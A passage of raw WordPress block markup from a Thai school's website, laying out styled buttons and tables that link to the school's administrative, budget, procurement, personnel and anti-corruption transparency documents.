900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 